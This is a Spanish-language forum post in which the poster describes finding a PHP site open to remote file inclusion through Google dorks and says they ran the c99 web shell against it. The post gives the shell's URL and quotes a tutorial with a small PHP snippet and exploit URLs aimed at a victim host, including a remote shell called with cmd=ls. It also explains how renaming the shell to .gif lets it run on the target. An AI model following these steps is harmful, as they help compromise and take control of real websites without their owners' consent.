bueno, segui con mi busqueda
filetype:php inurl:page inurl:htm y despues miraba el codigo fuente buscando cosas como las que dijo Azielito y al final creo que encontre una web vulnerable, pero comparado con la shell que se ve aca
http://www.youtube.com/watch?v=Zrp-HeeU4MEla que ejecute es parecida (
http://www.deyvill.org/c99.txt) con algunas cajas de texto pero con un gran desparramo de texto alrededor que parece codigo fuente... ¿que es eso? codigo que no se pudo ejecutar en el servidor? quise meter un simple
ls y me salto una pagina de error y despues intente con un
dir y paso lo mismo... alguien me puede explicar que es lo que vi? puede que estor errores al meter los comandos sean por el mismo motivo que hay codigo desparramado por toda la interfaz?
suponiendo que tengo
php?page=http://www.deyvill.org/c99.txtcomo tendria que hacer para ejecutar un comando desde la barra de direcciones, o sea, sin usar la shell? supongo que sera posible no?
--------------------- Minutos despues ------------------------
encontre esto la sección de textos de elhacker.net
Nota: solo van a correr estos comandos los servidores tengan el safe mode
en off.Entonces codeamos algo así:
<?php
$cmd=$_GET['cmd'];
show_source($cmd);
?>
Y lo subimos a nuestro Server, este seria explotado de esta manera:
http://victima.com/pagvuln.php?page=http//[tusitio]/file-a-incluir
Estas funciones permiten correr comandos en el sistema. Ya sabiendo
usarlas podemos ponerle una extensión .gif y subirlas a nuestro webserver
para incluirlas en la victima desde ahí. Se las renombra a .gif, ya que si las
dejáramos en php se ejecutarían en nuestro server.
Ejecutores de comandos
Los ejecutores de comandos o "shells en php" son líneas de código que permiten
ejecutar comandos más fácil, se usan así:
http://victima.com/pagvuln.php?page=http//[tusitio]/shell.php?cmd=ls
este ultimo renglon me genera una confusion, y es que dice shell.
php?cmd=ls , no tendira que decir shell.
gif?cmd=ls o cualquier otra extension que no sea php?
yo subi un archivo php y uno gif a un servidor para ver esto y cuando uso el php me dice que el safe mode esta activado y me da unos path del servidor donde estan los archivos que yo subi (entonces creo que se ejecuta en mi servidor) y cuando uso el gif no me muestra nada, supongo que el servidor vulnerable no es tan vulnerable y tiene tambien el safe mode acrivado
¿puede ser este el motivo por el que la shell c99 no se ve bien?